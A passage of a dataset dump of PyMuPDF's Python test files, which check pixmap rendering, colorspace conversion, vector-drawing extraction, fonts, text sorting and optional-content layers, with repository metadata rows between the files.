    # none of these constructions may raise
    resized = pymupdf.Pixmap(source, 20, 30, None)
    gray = pymupdf.Pixmap(pymupdf.csGRAY, source)
    combined = pymupdf.Pixmap(source, gray)
def test_3050():
    '''
    This is known to fail if MuPDF is built without it's default third-party
    libraries, e.g. in Linux system installs.

    Whitens all bright pixels in a 100x100 corner of a 4x-zoomed render and
    checks the resulting pixmap digest against a known value.
    '''
    pdf_file = pymupdf.open(pdf)
    for page_no, page in enumerate(pdf_file):
        zoom_x = 4.0
        zoom_y = 4.0
        matrix = pymupdf.Matrix(zoom_x, zoom_y)
        pix = page.get_pixmap(matrix=matrix)
        digest0 = pix.digest
        print(f'{pix.width=} {pix.height=}')
        def product(x, y):
            # Cartesian product of two iterables, yielding (x, y) pairs.
            for yy in y:
                for xx in x:
                    yield (xx, yy)
        n = 0
        # We use a small subset of the image because non-optimised rebase gets
        # very slow.
        for pos in product(range(100), range(100)):
            # pixel component sum >= 600 counts as "bright"; whiten it.
            if sum(pix.pixel(pos[0], pos[1])) >= 600:
                n += 1
                pix.set_pixel(pos[0], pos[1], (255, 255, 255))
        digest1 = pix.digest
        print(f'{page_no=} {n=} {digest0=} {digest1=}')
    digest_expected = b'\xd7x\x94_\x98\xa1<-/\xf3\xf9\x04\xec#\xaa\xee'
    pix.save(os.path.abspath(f'{__file__}/../../tests/test_3050_out.png'))
    # modifying pixels must have changed the digest, to the expected value
    assert digest1 != digest0
    assert digest1 == digest_expected
    rebased = hasattr(pymupdf, 'mupdf')
    if rebased:
        wt = pymupdf.TOOLS.mupdf_warnings()
        assert wt == 'PDF stream Length incorrect'
def test_3058():
    """CMYK image extraction and conversion to RGB (issue 3058)."""
    doc = pymupdf.Document(os.path.abspath(f'{__file__}/../../tests/resources/test_3058.pdf'))
    images = doc[0].get_images(full=True)
    pix = pymupdf.Pixmap(doc, 17)
    # First bug was that `pix.colorspace` was DeviceRGB.
    assert str(pix.colorspace) == 'Colorspace(CS_CMYK) - DeviceCMYK'
    pix = pymupdf.Pixmap(pymupdf.csRGB, pix)
    assert str(pix.colorspace) == 'Colorspace(CS_RGB) - DeviceRGB'
    # Second bug was that the image was converted to RGB via greyscale proofing
    # color space, so image contained only shades of grey. This compressed
    # easily to a .png file, so we crudely check the bug is fixed by looking at
    # size of .png file.
    path = os.path.abspath(f'{__file__}/../../tests/test_3058_out.png')
    pix.save(path)
    s = os.path.getsize(path)
    assert 1800000 < s < 2600000, f'Unexpected size of {path}: {s}'
def test_3072():
    """Render clipped/zoomed pixmaps from a PDF with broken ExtGState (issue 3072)."""
    if pymupdf.mupdf_version_tuple < (1, 23, 10):
        print(f'test_3072(): Not running because known to hang on MuPDF < 1.23.10.')
        return
    path = os.path.abspath(f'{__file__}/../../tests/resources/test_3072.pdf')
    out = os.path.abspath(f'{__file__}/../../tests')
    # Render a clip of page 0 at 3x zoom and save as JPEG.
    doc = pymupdf.open(path)
    page_48 = doc[0]
    bbox = [147, 300, 447, 699]
    rect = pymupdf.Rect(*bbox)
    zoom = pymupdf.Matrix(3, 3)
    pix = page_48.get_pixmap(clip=rect, matrix=zoom)
    image_save_path = f'{out}/1.jpg'
    pix.save(image_save_path, jpg_quality=95)
    # Repeat for a clip of page 1.
    doc = pymupdf.open(path)
    page_49 = doc[1]
    bbox = [147, 543, 447, 768]
    rect = pymupdf.Rect(*bbox)
    zoom = pymupdf.Matrix(3, 3)
    pix = page_49.get_pixmap(clip=rect, matrix=zoom)
    image_save_path = f'{out}/2.jpg'
    pix.save(image_save_path, jpg_quality=95)
    rebase = hasattr(pymupdf, 'mupdf')
    if rebase:
        # Each page render emits the same pair of syntax-error warnings.
        wt = pymupdf.TOOLS.mupdf_warnings()
        assert wt == (
                "syntax error: cannot find ExtGState resource 'BlendMode0'\n"
                "encountered syntax errors; page may not be correct\n"
                "syntax error: cannot find ExtGState resource 'BlendMode0'\n"
                "encountered syntax errors; page may not be correct"
                )
def test_3134():
    """Rect and IRect clips of identical size must render identical JPEGs."""
    doc = pymupdf.Document()
    page = doc.new_page()
    clip_r = pymupdf.Rect(0, 0, 100, 100)
    clip_i = pymupdf.IRect(0, 0, 100, 100)
    page.get_pixmap(clip=clip_r).save("test_3134_rect.jpg")
    page.get_pixmap(clip=clip_i).save("test_3134_irect.jpg")
    stat_rect = os.stat('test_3134_rect.jpg')
    stat_irect = os.stat('test_3134_irect.jpg')
    print(f' {stat_rect=}')
    print(f'{stat_irect=}')
    # Both clip flavours must produce files of the same size.
    assert stat_rect.st_size == stat_irect.st_size
def test_3177():
    """A transparent PNG must be usable as base of a derived Pixmap (issue 3177)."""
    png = os.path.abspath(f'{__file__}/../../tests/resources/img-transparent.png')
    src = pymupdf.Pixmap(png)
    pymupdf.Pixmap(None, src)
def test_3493():
    '''
    If python3-gi is installed, we check fix for #3493, where importing gi
    would load an older version of libjpeg than is used in MuPDF, and break
    MuPDF.
    This test is excluded by default in sysinstall tests, because running
    commands in a new venv does not seem to pick up pymupdf as expected.
    '''
    if platform.system() != 'Linux':
        print(f'Not running because not Linux: {platform.system()=}')
        return
    import subprocess
    root = os.path.abspath(f'{__file__}/../..')
    in_path = f'{root}/tests/resources/test_3493.epub'
    def run(command, check=1, stdout=None):
        # Shell out, echoing the command for the test log.
        print(f'Running with {check=}: {command}')
        return subprocess.run(command, shell=1, check=check, stdout=stdout, text=1)
    def run_code(code, code_path, *, check=True, venv=None, venv_args='', pythonpath=None, stdout=None):
        # Write dedented `code` to `code_path` and run it, optionally inside
        # a freshly-created venv and/or with PYTHONPATH prefixed.
        code = textwrap.dedent(code)
        with open(code_path, 'w') as f:
            f.write(code)
        prefix = f'PYTHONPATH={pythonpath} ' if pythonpath else ''
        if venv:
            # Have seen this fail on Github in a curious way:
            #
            # Running: /tmp/tmp.fBeKNLJQKk/venv/bin/python -m venv --system-site-packages /project/tests/resources/test_3493_venv
            # Error: [Errno 2] No such file or directory: '/project/tests/resources/test_3493_venv/bin/python'
            #
            r = run(f'{sys.executable} -m venv {venv_args} {venv}', check=check)
            if r.returncode:
                return r
            r = run(f'. {venv}/bin/activate && {prefix}python {code_path}', check=check, stdout=stdout)
        else:
            r = run(f'{prefix}{sys.executable} {code_path}', check=check, stdout=stdout)
        return r
    # Find location of system install of `gi`.
    r = run_code(
        '''
        from gi.repository import GdkPixbuf
        import gi
        print(gi.__file__)
        '''
        ,
        f'{root}/tests/resources/test_3493_gi.py',
        check=0,
        venv=f'{root}/tests/resources/test_3493_venv',
        venv_args='--system-site-packages',
        stdout=subprocess.PIPE,
        )
    if r.returncode:
        print(f'test_3493(): Not running test because --system-site-packages venv cannot import gi.')
        return
    gi = r.stdout.strip()
    gi_pythonpath = os.path.abspath(f'{gi}/../..')
    def do(gi):
        # Run code that will import gi and pymupdf in different orders, and
        # return contents of generated .png file as a bytes.
        out = f'{root}/tests/resources/test_3493_{gi}.png'
        run_code(
            f'''
            if {gi}==0:
                import pymupdf
            elif {gi}==1:
                from gi.repository import GdkPixbuf
                import pymupdf
            elif {gi}==2:
                import pymupdf
                from gi.repository import GdkPixbuf
            else:
                assert 0
            document = pymupdf.Document('{in_path}')
            page = document[0]
            print(f'{gi=}: saving to: {out}')
            page.get_pixmap().save('{out}')
            '''
            ,
            os.path.abspath(f'{root}/tests/resources/test_3493_{gi}.py'),
            pythonpath=gi_pythonpath,
            )
        with open(out, 'rb') as f:
            return f.read()
    # Render the same page with all three import orders and compare bytes.
    out0 = do(0)
    out1 = do(1)
    out2 = do(2)
    print(f'{len(out0)=} {len(out1)=} {len(out2)=}.')
    if pymupdf.mupdf_version_tuple >= (1, 24, 3):
        # Fixed: importing gi first must not change the rendered output.
        assert out1 == out0
    else:
        assert out1 != out0
    assert out2 == out0
def test_3848():
    """Smoke-test color_topusage() on drawing clips that contain text (issue 3848)."""
    path = os.path.normpath(f'{__file__}/../../tests/resources/test_3848.pdf')
    with pymupdf.open(path) as document:
        for page_number in range(document.page_count):
            page = document.load_page(page_number)
            print(f'{page=}.')
            for drawing in page.get_drawings():
                clip = drawing['rect']
                if page.get_textbox(clip):
                    pixmap = page.get_pixmap(clip=clip)
                    pixmap.color_topusage()
| 13,375 | Python | .py | 328 | 33.088415 | 192 | 0.617217 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,335 | test_2907.py | pymupdf_PyMuPDF/tests/test_2907.py | import pymupdf
import os.path
import pathlib
def test_2907():
    """clean_contents() on a specific PDF must not crash (issue 2907)."""
    # This test is for a bug in classic 'segfault trying to call clean_contents
    # on certain pdfs with python 3.12', which we are not going to fix.
    if not hasattr(pymupdf, 'mupdf'):
        print('test_2907(): not running on classic because known to fail.')
        return
    path = os.path.abspath(f'{__file__}/../../tests/resources/test_2907.pdf')
    data = pathlib.Path(path).read_bytes()
    document = pymupdf.open(stream=data, filetype="application/pdf")
    # The document has exactly one page.
    (page,) = list(document.pages())
    page.clean_contents()
    if pymupdf.mupdf_version_tuple < (1, 24, 2):
        # We expect 'dropping unclosed PDF processor' warnings.
        assert pymupdf.TOOLS.mupdf_warnings()
| 818 | Python | .py | 19 | 37.684211 | 79 | 0.678392 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,336 | test_2904.py | pymupdf_PyMuPDF/tests/test_2904.py | import pymupdf
import os
import sys
def test_2904():
    """get_image_rects() must raise exactly for the broken JPX image (issue 2904)."""
    print(f'test_2904(): {pymupdf.mupdf_version_tuple=}.')
    path = os.path.abspath(f'{__file__}/../../tests/resources/test_2904.pdf')
    pdf_docs = pymupdf.open(path)
    for page_id, page in enumerate(pdf_docs):
        page_imgs = page.get_images()
        for i, img in enumerate(page_imgs):
            if page_id == 5:
                #print(f'{page_id=} {i=} {type(img)=} {img=}')
                sys.stdout.flush()
            e = None
            try:
                recs = page.get_image_rects(img, transform=True)
            except Exception as ee:
                print(f'Exception: {page_id=} {i=} {img=}: {ee}')
                if 0 and hasattr(pymupdf, 'mupdf'):
                    print(f'pymupdf.exception_info:')
                    pymupdf.exception_info()
                    sys.stdout.flush()
                e = ee
            if page_id == 5:
                print(f'{pymupdf.mupdf_version_tuple=}: {page_id=} {i=} {e=} {img=}:')
            # Only image 3 on page 5 has the corrupt JPX header; everything
            # else must succeed. The exception text depends on the backend.
            if page_id == 5 and i==3:
                assert e
                if hasattr(pymupdf, 'mupdf'):
                    # rebased.
                    if pymupdf.mupdf_version_tuple >= (1, 24):
                        assert str(e) == 'code=8: Failed to read JPX header'
                    else:
                        assert str(e) == 'code=4: Failed to read JPX header'
                else:
                    # classic
                    assert str(e) == 'Failed to read JPX header'
            else:
                assert not e
    # Clear warnings, as we will have generated many.
    pymupdf.TOOLS.mupdf_warnings()
| 1,661 | Python | .py | 40 | 27.525 | 86 | 0.479554 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,337 | test_linebreaks.py | pymupdf_PyMuPDF/tests/test_linebreaks.py | import pymupdf
import os.path
def test_linebreaks():
    """Sorted text extraction must merge words into far fewer lines."""
    filepath = os.path.abspath(f"{__file__}/../../tests/resources/test-linebreaks.pdf")
    document = pymupdf.open(filepath)
    first_page = document[0]
    textpage = first_page.get_textpage(flags=pymupdf.TEXTFLAGS_WORDS)
    words = first_page.get_text("words", textpage=textpage)
    unsorted_lines = first_page.get_text(textpage=textpage).splitlines()
    sorted_lines = first_page.get_text(sort=True, textpage=textpage).splitlines()
    # Unsorted extraction puts every word on its own line ...
    assert len(words) == len(unsorted_lines)
    # ... while sorting merges words back into proper lines.
    assert len(sorted_lines) < len(unsorted_lines) / 2
| 558 | Python | .py | 13 | 38.615385 | 83 | 0.691882 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,338 | test_drawings.py | pymupdf_PyMuPDF/tests/test_drawings.py | """
Extract drawings of a PDF page and compare with stored expected result.
"""
import io
import os
import sys
import pprint
import pymupdf
# Locations of the input PDF and the stored expected drawings dump.
scriptdir = os.path.abspath(os.path.dirname(__file__))
filename = os.path.join(scriptdir, "resources", "symbol-list.pdf")
symbols = os.path.join(scriptdir, "resources", "symbols.txt")
def test_drawings1():
    """Compare get_cdrawings() output with the stored expected dump."""
    expected = open(symbols).read()
    document = pymupdf.open(filename)
    buf = io.StringIO()  # pprint output goes here
    pprint.pprint(document[0].get_cdrawings(), stream=buf)
    assert buf.getvalue() == expected
def test_drawings2():
    """Draw one specimen of each primitive; each extracted drawing rect
    must be contained in the corresponding bbox-log entry."""
    delta = (0, 20, 0, 20)
    doc = pymupdf.open()
    page = doc.new_page()
    r = pymupdf.Rect(100, 100, 200, 200)
    # Draw each primitive in its own rectangle, shifting down by `delta`.
    page.draw_circle(r.br, 2, color=0)
    r += delta
    page.draw_line(r.tl, r.br, color=0)
    r += delta
    page.draw_oval(r, color=0)
    r += delta
    page.draw_rect(r, color=0)
    r += delta
    page.draw_quad(r.quad, color=0)
    r += delta
    page.draw_polyline((r.tl, r.tr, r.br), color=0)
    r += delta
    page.draw_bezier(r.tl, r.tr, r.br, r.bl, color=0)
    r += delta
    page.draw_curve(r.tl, r.tr, r.br, color=0)
    r += delta
    page.draw_squiggle(r.tl, r.br, color=0)
    r += delta
    # Drawings and bbox-log entries are produced in the same order.
    rects = [p["rect"] for p in page.get_cdrawings()]
    bboxes = [b[1] for b in page.get_bboxlog()]
    for i, r in enumerate(rects):
        assert pymupdf.Rect(r) in pymupdf.Rect(bboxes[i])
def _dict_difference(a, b):
"""
Verifies that dictionaries "a", "b"
* have the same keys and values, except for key "items":
* the items list of "a" must be one shorter but otherwise equal the "b" items
Returns last item of b["items"].
"""
assert a.keys() == b.keys()
for k in a.keys():
v1 = a[k]
v2 = b[k]
if k != "items":
assert v1 == v2
else:
assert v1 == v2[:-1]
rc = v2[-1]
return rc
def test_drawings3():
    """Closing a path must add exactly one extra line back to its start.

    Two-line and three-line open shapes are finished with closePath
    False/True; the closed variant must differ from the open one only by a
    final line connecting the last point with the first.
    """
    doc = pymupdf.open()
    # Two-line open path ...
    page1 = doc.new_page()
    shape1 = page1.new_shape()
    shape1.draw_line((10, 10), (10, 50))
    shape1.draw_line((10, 50), (100, 100))
    shape1.finish(closePath=False)
    shape1.commit()
    drawings1 = page1.get_drawings()[0]
    # ... versus the same path closed.
    page2 = doc.new_page()
    shape2 = page2.new_shape()
    shape2.draw_line((10, 10), (10, 50))
    shape2.draw_line((10, 50), (100, 100))
    shape2.finish(closePath=True)
    shape2.commit()
    drawings2 = page2.get_drawings()[0]
    # The only difference must be the closing line (100,100) -> (10,10).
    assert _dict_difference(drawings1, drawings2) == ("l", (100, 100), (10, 10))
    # Repeat with a three-line path.
    page3 = doc.new_page()
    shape3 = page3.new_shape()
    shape3.draw_line((10, 10), (10, 50))
    shape3.draw_line((10, 50), (100, 100))
    shape3.draw_line((100, 100), (50, 70))
    shape3.finish(closePath=False)
    shape3.commit()
    drawings3 = page3.get_drawings()[0]
    page4 = doc.new_page()
    shape4 = page4.new_shape()
    shape4.draw_line((10, 10), (10, 50))
    shape4.draw_line((10, 50), (100, 100))
    shape4.draw_line((100, 100), (50, 70))
    shape4.finish(closePath=True)
    shape4.commit()
    drawings4 = page4.get_drawings()[0]
    assert _dict_difference(drawings3, drawings4) == ("l", (50, 70), (10, 10))
def test_2365():
    """Draw a filled rectangle on a new page.
    Then extract the page's vector graphics and confirm that only one path
    was generated which has all the right properties."""
    doc = pymupdf.open()
    page = doc.new_page()
    rect = pymupdf.Rect(100, 100, 200, 200)
    black = pymupdf.pdfcolor["black"]
    yellow = pymupdf.pdfcolor["yellow"]
    page.draw_rect(rect, color=black, fill=yellow, width=3)
    paths = page.get_drawings()
    assert len(paths) == 1
    (path,) = paths
    assert path["type"] == "fs"  # filled and stroked
    assert path["fill"] == yellow
    assert path["fill_opacity"] == 1
    assert path["color"] == black
    assert path["stroke_opacity"] == 1
    assert path["width"] == 3
    assert path["rect"] == rect
def test_2462():
    """
    Assertion happens, if this code does NOT bring down the interpreter.
    Background:
    We previously ignored clips for non-vector-graphics. However, ending
    a clip does not refer back the object(s) that have been clipped.
    In order to correctly compute the "scissor" rectangle, we now keep track
    of the clipped object type.
    """
    document = pymupdf.open(f"{scriptdir}/resources/test-2462.pdf")
    # Extended extraction walks the clip paths - this used to crash.
    document[0].get_drawings(extended=True)
def test_2556():
    """Ensure that incomplete clip paths will be properly ignored."""
    doc = pymupdf.open()
    page = doc.new_page()
    # Drawing commands containing an incomplete clip ("q 0 0 m W n Q").
    content = b"q 50 697.6 400 100.0 re W n q 0 0 m W n Q "
    xref = doc.get_new_xref()
    doc.update_object(xref, "<<>>")     # make the new xref a dictionary
    doc.update_stream(xref, content)    # store the drawing commands
    page.set_contents(xref)             # use it as the page's /Contents
    # Without the fix the following call brought down the interpreter.
    assert page.get_drawings(extended=True)
def test_3207():
    """Example graphics with multiple "close path" commands within same path.

    The fix translates a close-path command into an additional line
    which connects the current point with a preceding "move" target.

    The example page has 2 paths which each contain 2 close-path
    commands after 2 normal "line" commands, i.e. 2 command sequences
    "move-to, line-to, line-to, close-path".
    This is converted into 3 connected lines, where the last end point
    is connected to the start point of the first line.
    So, in the sequence of lines / points
    (p0, p1), (p2, p3), (p4, p5), (p6, p7), (p8, p9), (p10, p11)
    point p5 must equal p0, and p11 must equal p6 (for each of the
    two paths in the example).
    """
    filename = os.path.join(scriptdir, "resources", "test-3207.pdf")
    doc = pymupdf.open(filename)
    page = doc[0]
    paths = page.get_drawings()
    assert len(paths) == 2
    # Both paths must show the same closed structure, so check them in a
    # loop instead of duplicating the assertions per path.
    for path in paths:
        items = path["items"]
        assert len(items) == 6
        # First close-path: end of line 3 equals start of line 1.
        assert items[0][1] == items[2][2]
        # Second close-path: end of line 6 equals start of line 4.
        assert items[3][1] == items[5][2]
def test_3591():
    """Confirm correct scaling factor for rotation matrices."""
    doc = pymupdf.open(os.path.join(scriptdir, "resources", "test-3591.pdf"))
    widths = [path["width"] for path in doc[0].get_drawings()]
    # Every stroked path must report the unscaled line width.
    assert all(w == 15 for w in widths)
| 6,746 | Python | .py | 186 | 31.182796 | 87 | 0.638889 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,339 | test_font.py | pymupdf_PyMuPDF/tests/test_font.py | """
Tests for the Font class.
"""
import pymupdf
import os
def test_font1():
    """Basic Font properties: name, text metrics, codepoints and bbox."""
    text = "PyMuPDF"
    font = pymupdf.Font("helv")
    assert font.name == "Helvetica"
    tl = font.text_length(text, fontsize=20)
    cl = font.char_lengths(text, fontsize=20)
    assert len(text) == len(cl)
    # The per-character widths must sum to the total text length.
    assert abs(sum(cl) - tl) < pymupdf.EPSILON
    for i in range(len(cl)):
        assert cl[i] == font.glyph_advance(ord(text[i])) * 20
    # A font rebuilt from its own buffer must expose the same codepoints.
    font2 = pymupdf.Font(fontbuffer=font.buffer)
    codepoints1 = font.valid_codepoints()
    codepoints2 = font2.valid_codepoints()
    print('')
    print(f'{len(codepoints1)=}')
    print(f'{len(codepoints2)=}')
    if 0:   # debug output of differing codepoints
        for i, (ucs1, ucs2) in enumerate(zip(codepoints1, codepoints2)):
            # Bug fix: originally compared `ucs2==ucs2` (always true), so
            # differing codepoints were never flagged with '*'.
            print(f'    {i}: {ucs1=} {ucs2=} {"" if ucs1==ucs2 else "*"}')
    assert font2.valid_codepoints() == font.valid_codepoints()
    # Also check we can get font's bbox.
    bbox1 = font.bbox
    print(f'{bbox1=}')
    if hasattr(pymupdf, 'mupdf'):
        bbox2 = font.this.fz_font_bbox()
        assert bbox2 == bbox1
def test_font2():
    """Old and new length computation must be the same."""
    sample = "PyMuPDF"
    helv = pymupdf.Font("helv")
    assert helv.text_length(sample) == pymupdf.get_text_length(sample)
def test_fontname():
    """Valid PDF font names are accepted, illegal characters rejected."""
    doc = pymupdf.open()
    page = doc.new_page()
    # The default (valid) fontname must work.
    assert page.insert_font()
    # An illegal fontname must be rejected before any font file is needed.
    rejected = False
    try:
        page.insert_font(fontname="illegal/char", fontfile="unimportant")
    except ValueError as exc:
        rejected = str(exc).startswith("bad fontname chars")
    assert rejected
def test_2608():
    """Dehyphenated block extraction must match the stored expected text (issue 2608)."""
    if pymupdf.mupdf_version_tuple <= (1, 23, 4):
        print( f'Not running test_2608 because mupdf too old: {pymupdf.mupdf_version_tuple=}')
        return
    flags = (pymupdf.TEXT_DEHYPHENATE | pymupdf.TEXT_MEDIABOX_CLIP)
    with pymupdf.open(os.path.abspath(f'{__file__}/../../tests/resources/2201.00069.pdf')) as doc:
        page = doc[0]
        blocks = page.get_text_blocks(flags=flags)
        text = blocks[10][4]
    # Save the extracted text for debugging failed runs.
    with open(os.path.abspath(f'{__file__}/../../tests/test_2608_out'), 'wb') as f:
        f.write(text.encode('utf8'))
    path_expected = os.path.normpath(f'{__file__}/../../tests/resources/test_2608_expected')
    with open(path_expected, 'rb') as f:
        expected = f.read().decode('utf8')
    # Github windows x32 seems to insert \r characters; maybe something to
    # do with the Python installation's line endings settings.
    expected = expected.replace('\r', '')
    print(f'test_2608(): {text.encode("utf8")=}')
    print(f'test_2608(): {expected.encode("utf8")=}')
    assert text == expected
def test_fontarchive():
    """css_for_pymupdf_font() must register all four noto variants in the archive."""
    # NOTE: removed an unused local `import subprocess` from the original.
    arch = pymupdf.Archive()
    css = pymupdf.css_for_pymupdf_font("notos", archive=arch, name="sans-serif")
    print(css)
    print(arch.entry_list)
    expected = [
        {
            'fmt': 'tree',
            'entries': ['notosbo', 'notosbi', 'notosit', 'notos'],
            'path': None,
        }
    ]
    assert arch.entry_list == expected
def test_load_system_font():
    """Installed font-loading callbacks must be invoked by fz_load_system_font
    (rebased implementation, MuPDF >= 1.24 only)."""
    if not hasattr(pymupdf, 'mupdf'):
        print(f'test_load_system_font(): Not running on classic.')
        return
    if pymupdf.mupdf_version_tuple < (1, 24):
        print(f'test_load_system_font(): Not running because mupdf version < 1.24.')
        return
    # Each callback records its arguments and returns None (font not found).
    trace = list()
    def font_f(name, bold, italic, needs_exact_metrics):
        trace.append((name, bold, italic, needs_exact_metrics))
        print(f'test_load_system_font():font_f(): Looking for font: {name=} {bold=} {italic=} {needs_exact_metrics=}.')
        return None
    def f_cjk(name, ordering, serif):
        trace.append((name, ordering, serif))
        print(f'test_load_system_font():f_cjk(): Looking for font: {name=} {ordering=} {serif=}.')
        return None
    def f_fallback(script, language, serif, bold, italic):
        trace.append((script, language, serif, bold, italic))
        print(f'test_load_system_font():f_fallback(): looking for font: {script=} {language=} {serif=} {bold=} {italic=}.')
        return None
    pymupdf.mupdf.fz_install_load_system_font_funcs(font_f, f_cjk, f_fallback)
    f = pymupdf.mupdf.fz_load_system_font("some-font-name", 0, 0, 0)
    # Only the plain callback should have been called, exactly once.
    assert trace == [
        ('some-font-name', 0, 0, 0),
        ], f'Incorrect {trace=}.'
    print(f'test_load_system_font(): {f.m_internal=}')
def test_mupdf_subset_fonts2():
    """Exercise pdf_subset_fonts2() on every second page of a test file."""
    if not hasattr(pymupdf, 'mupdf'):
        # Bug fix: this branch runs on the classic implementation (no raw
        # `mupdf` module), but the original message said "rebased".
        print('Not running on classic.')
        return
    if pymupdf.mupdf_version_tuple < (1, 24):
        print('Not running with mupdf < 1.24.')
        return
    path = os.path.abspath(f'{__file__}/../../tests/resources/2.pdf')
    with pymupdf.open(path) as doc:
        n = len(doc)
        pages = [i*2 for i in range(n//2)]  # every second page
        print(f'{pages=}.')
        pymupdf.mupdf.pdf_subset_fonts2(pymupdf._as_pdf_document(doc), pages)
def test_3677():
    """Subset-font name prefixes (e.g. 'BCDEEE+') must be reported (issue 3677)."""
    path = os.path.abspath(f'{__file__}/../../tests/resources/test_3677.pdf')
    font_names_expected = [
        'BCDEEE+Aptos',
        'BCDFEE+Aptos',
        'BCDGEE+Calibri-Light',
        'BCDHEE+Calibri-Light',
    ]
    # Bug fix: the original enabled the global subset-fontnames flag and never
    # restored it, leaking state into later tests. Save and restore it, the
    # same way test_textbox5 handles set_small_glyph_heights().
    old_setting = pymupdf.TOOLS.set_subset_fontnames()
    pymupdf.TOOLS.set_subset_fontnames(True)
    try:
        font_names = list()
        with pymupdf.open(path) as document:
            for page in document:
                for block in page.get_text('dict')['blocks']:
                    if block['type'] == 0 and 'lines' in block.keys():
                        for line in block['lines']:
                            for span in line['spans']:
                                font_name = span['font']
                                print(font_name)
                                font_names.append(font_name)
        assert font_names == font_names_expected, f'{font_names=}'
    finally:
        pymupdf.TOOLS.set_subset_fontnames(old_setting)
def test_3933():
    """valid_codepoints() of extracted fonts must match the expected counts
    (non-zero only from MuPDF 1.25 on)."""
    path = os.path.normpath(f'{__file__}/../../tests/resources/test_3933.pdf')
    with pymupdf.open(path) as document:
        page = document[0]
        print(f'{len(page.get_fonts())=}')
        # Expected number of valid codepoints per (subset) font name.
        expected = {
                'BCDEEE+Calibri': 39,
                'BCDFEE+SwissReSan-Regu': 53,
                'BCDGEE+SwissReSan-Ital': 20,
                'BCDHEE+SwissReSan-Bold': 20,
                'BCDIEE+SwissReSan-Regu': 53,
                'BCDJEE+Calibri': 39,
                }
        for xref, _, _, name, _, _ in page.get_fonts():
            _, _, _, content = document.extract_font(xref)
            if content:
                font = pymupdf.Font(fontname=name, fontbuffer=content)
                supported_symbols = font.valid_codepoints()
                print(f'Font {name}: {len(supported_symbols)=}.', flush=1)
                if pymupdf.mupdf_version_tuple < (1, 25):
                    # Older MuPDF cannot report codepoints here.
                    assert len(supported_symbols) == 0
                else:
                    assert len(supported_symbols) == expected.get(name)
| 7,255 | Python | .py | 168 | 33.52381 | 123 | 0.574166 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,340 | test_optional_content.py | pymupdf_PyMuPDF/tests/test_optional_content.py | """
Test of Optional Content code.
"""
import os
import pymupdf
# Location of this test directory and the multi-page input PDF used below.
scriptdir = os.path.abspath(os.path.dirname(__file__))
filename = os.path.join(scriptdir, "resources", "joined.pdf")
def test_oc1():
    """Arbitrary calls to OC code to get coverage."""
    doc = pymupdf.open()
    ocg1 = doc.add_ocg("ocg1")
    ocg2 = doc.add_ocg("ocg2")
    doc.add_ocg("ocg3")
    doc.set_ocmd(xref=0, ocgs=(ocg1, ocg2))
    doc.set_layer(-1)
    doc.add_layer("layer1")
    # Read back the various layer / OCG views.
    doc.get_layer()
    doc.get_layers()
    doc.get_ocgs()
    doc.layer_ui_configs()
    doc.switch_layer(0)
def test_oc2():
    """Place 4 source pages in page quadrants, each under its own OCMD so
    exactly one is visible; verify the OCG/OCMD wiring."""
    # source file with at least 4 pages
    src = pymupdf.open(filename)
    # new PDF with one page
    doc = pymupdf.open()
    page = doc.new_page()
    # define the 4 rectangle quadrants to receive the source pages
    r0 = page.rect / 2
    r1 = r0 + (r0.width, 0, r0.width, 0)
    r2 = r0 + (0, r0.height, 0, r0.height)
    r3 = r2 + (r2.width, 0, r2.width, 0)
    # make 4 OCGs - one for each source page image.
    # only first is ON initially
    ocg0 = doc.add_ocg("ocg0", on=True)
    ocg1 = doc.add_ocg("ocg1", on=False)
    ocg2 = doc.add_ocg("ocg2", on=False)
    ocg3 = doc.add_ocg("ocg3", on=False)
    # Each OCMD: visible iff its own OCG is on and all others are off.
    ocmd0 = doc.set_ocmd(ve=["and", ocg0, ["not", ["or", ocg1, ocg2, ocg3]]])
    ocmd1 = doc.set_ocmd(ve=["and", ocg1, ["not", ["or", ocg0, ocg2, ocg3]]])
    ocmd2 = doc.set_ocmd(ve=["and", ocg2, ["not", ["or", ocg1, ocg0, ocg3]]])
    ocmd3 = doc.set_ocmd(ve=["and", ocg3, ["not", ["or", ocg1, ocg2, ocg0]]])
    ocmds = (ocmd0, ocmd1, ocmd2, ocmd3)
    # insert the 4 source page images, each connected to one OCG
    page.show_pdf_page(r0, src, 0, oc=ocmd0)
    page.show_pdf_page(r1, src, 1, oc=ocmd1)
    page.show_pdf_page(r2, src, 2, oc=ocmd2)
    page.show_pdf_page(r3, src, 3, oc=ocmd3)
    # Every inserted XObject must carry one of our OCMDs.
    xobj_ocmds = [doc.get_oc(item[0]) for item in page.get_xobjects() if item[1] != 0]
    assert set(ocmds) <= set(xobj_ocmds)
    assert set((ocg0, ocg1, ocg2, ocg3)) == set(tuple(doc.get_ocgs().keys()))
    # Coverage: read back an OCMD definition and the page's OC items.
    doc.get_ocmd(ocmd0)
    page.get_oc_items()
def test_3143():
    """Support for non-ascii layer names."""
    doc = pymupdf.open(os.path.join(scriptdir, "resources", "test-3143.pdf"))
    page = doc[0]
    names_from_ui = {cfg["text"] for cfg in doc.layer_ui_configs()}
    names_from_drawings = {path["layer"] for path in page.get_drawings()}
    names_from_bboxlog = {entry[2] for entry in page.get_bboxlog(layers=True)}
    # All three extraction routes must agree on the layer names.
    assert names_from_ui == names_from_drawings == names_from_bboxlog
def test_3180():
    """Create a combo box widget plus per-item OCGs and save the PDF (issue 3180)."""
    doc = pymupdf.open()
    page = doc.new_page()
    # Define the items for the combo box
    combo_items = ['first', 'second', 'third']
    # Create a combo box field
    combo_box = pymupdf.Widget()  # create a new widget
    combo_box.field_type = pymupdf.PDF_WIDGET_TYPE_COMBOBOX
    combo_box.field_name = "myComboBox"
    combo_box.field_value = combo_items[0]
    combo_box.choice_values = combo_items
    combo_box.rect = pymupdf.Rect(50, 50, 200, 75)  # position of the combo box
    combo_box.script_change = """
        var value = event.value;
